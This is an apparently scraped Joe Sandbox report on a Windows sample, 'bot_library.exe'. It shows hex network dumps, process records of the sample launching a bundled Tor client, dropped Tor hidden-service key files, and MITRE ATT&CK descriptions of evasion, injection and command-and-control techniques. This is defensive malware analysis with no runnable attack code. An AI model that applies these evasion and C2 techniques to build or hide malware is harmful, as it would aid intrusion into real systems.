2024-09-12 17:58:17 UTC	8000	IN	Data Raw: f3 4f 5f 06 e5 bb 43 a5 74 7d 67 57 51 e3 ca 77 94 89 a8 77 8c 3b d2 ab 9b bd af 7c 87 1d 42 d4 db cd 53 ba bd 0b 21 51 ec 69 06 2b d9 d7 57 b6 9a 4a ea 73 49 57 e7 3b cc d2 47 fa 5d 43 88 a2 ff a0 40 16 d5 5b 83 97 f4 48 25 a3 de d2 2e 41 1d b3 19 58 3a 3a 49 96 60 74 12 52 b1 9a 48 e9 f5 2e af 45 3d 57 79 c7 1d 75 53 57 3b 79 87 9a 64 f7 5b 3a 75 d7 ab 76 56 75 ed c4 ab ad 47 3a 1b db db 24 2f e9 96 4a da bc a5 5d de bb 5c ed 64 bb 1a 6a 0c 1c 3f ff f6 65 30 cc 1e a7 76 ea db 63 cd 9e a7 76 e0 84 48 2a 76 19 29 1d 7b 0b 53 a7 bc 11 bf 52 d4 d5 aa 5e d0 cd de a7 4c 6a bc 95 61 6a 5e d2 7b 25 7b 1f e9 e2 36 88 b3 9b 94 2e 6e 83 15 91 ae 53 3a 3f be 5c 6d b0 96 9a 4a ea 73 49 bb 0d c2 e5 e5 48 bb 60 e1 28 98 d2 d5 35 8f 0b 2f 3f 9a 1d e3 09 a9 3e ae 9c 74 Data Ascii: O_Ct}gWQww;\|BS!Qi+WJsIW;G]C@[H%.AX::I`tRH.E=WyuSW;yd[:uvVuG:$/J]\dj?e0vcvH*v){SR^Ljaj^{%{6.nS:?\mJsIH`(5/?>t
2024-09-12 17:58:17 UTC	8000	IN	Data Raw: 22 85 81 09 fe fc 32 28 66 ef 6e 63 46 d9 36 ab e4 6b 6b 06 4e 12 91 f9 9c a4 07 8e 8a 83 1c 75 ee aa 83 9c a0 aa 03 97 12 0c b1 63 f2 d2 f0 58 73 65 ca e7 0e e1 6a 49 20 25 38 9a 91 09 b8 3e de aa 54 ac d9 34 e0 d5 5c b3 d5 07 26 84 7f 98 ad cf 09 13 de f6 ee 3f 4c 78 1f b1 9b cf a5 08 ac 3b 46 36 99 3e 6a 2e b7 2a a2 e7 fd db 6c 1b 1c 2a 62 66 a4 f4 58 d6 1d 9e ff 3f 98 3d 9b 75 5f 6b 9f 9a 6b 1f 04 be 75 79 d7 e6 21 ac 9e c0 60 04 fa 4a 5e 38 57 51 75 77 6e 44 68 f1 2c 55 87 9b 26 5f 3e 75 79 0f cf dc 15 2e 8b ae 1d b9 2c 92 ca 3e 1f 60 24 fb 64 70 7a de 61 40 f8 23 ed 12 c4 30 e3 7c e7 30 53 c3 cf cc 76 88 00 99 e4 59 c4 07 c8 24 cf b2 25 e2 c4 67 92 ed 4e b2 65 92 c7 f6 18 20 93 3c 53 5d 80 4c b2 e7 6a 3d 40 26 d9 f7 a5 64 64 92 67 65 1a 20 93 f4 cd Data Ascii: "2(fncF6kkNucXsejI %8>T4\&?Lx;F6>j.lbfX?=u_kkuy!`J^8WQuwnDh,U&_>uy.,>`$dpza@#0\|0SvY$%gNe <S]Lj=@&ddge

Target ID:	0
Start time:	13:58:08
Start date:	12/09/2024
Path:	C:\Users\user\Desktop\bot_library.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\bot_library.exe"
Imagebase:	0x7ff7ff610000
File size:	5'029'376 bytes
MD5 hash:	1F669CE249A053178531A1F2009F150B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	4
Start time:	13:58:13
Start date:	12/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\explorer.exe"
Imagebase:	0x7ff66f810000
File size:	4'849'904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	13:58:25
Start date:	12/09/2024
Path:	C:\Tor\tor\tor.exe
Wow64 process (32bit):	false
Commandline:	"C:/Tor/tor/tor.exe" -f C:/Tor/torrc
Imagebase:	0x7ff674550000
File size:	8'983'040 bytes
MD5 hash:	A46913AB31875CF8152C96BD25027B4D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bot_library.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Tor\data\geoip

C:\Tor\data\geoip6

C:\Tor\hidden_service\hostname (copy)

C:\Tor\hidden_service\hostname.tmp

C:\Tor\hidden_service\hs_ed25519_public_key (copy)

C:\Tor\hidden_service\hs_ed25519_public_key.tmp

C:\Tor\hidden_service\hs_ed25519_secret_key (copy)

C:\Tor\hidden_service\hs_ed25519_secret_key.tmp

C:\Tor\tor.tar.gz

C:\Tor\tor\pluggable_transports\README.CONJURE.md

C:\Tor\tor\pluggable_transports\README.SNOWFLAKE.md

C:\Tor\tor\pluggable_transports\conjure-client.exe

C:\Tor\tor\pluggable_transports\lyrebird.exe

C:\Tor\tor\pluggable_transports\pt_config.json

C:\Tor\tor\pluggable_transports\snowflake-client.exe

C:\Tor\tor\tor-gencert.exe

C:\Tor\tor\tor.exe

C:\Tor\torrc

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22nf2lue.nck.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqesxnom.mw4.psm1

C:\Users\user\AppData\Roaming\tor\cached-certs (copy)

Windows Analysis Report
bot_library.exe

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre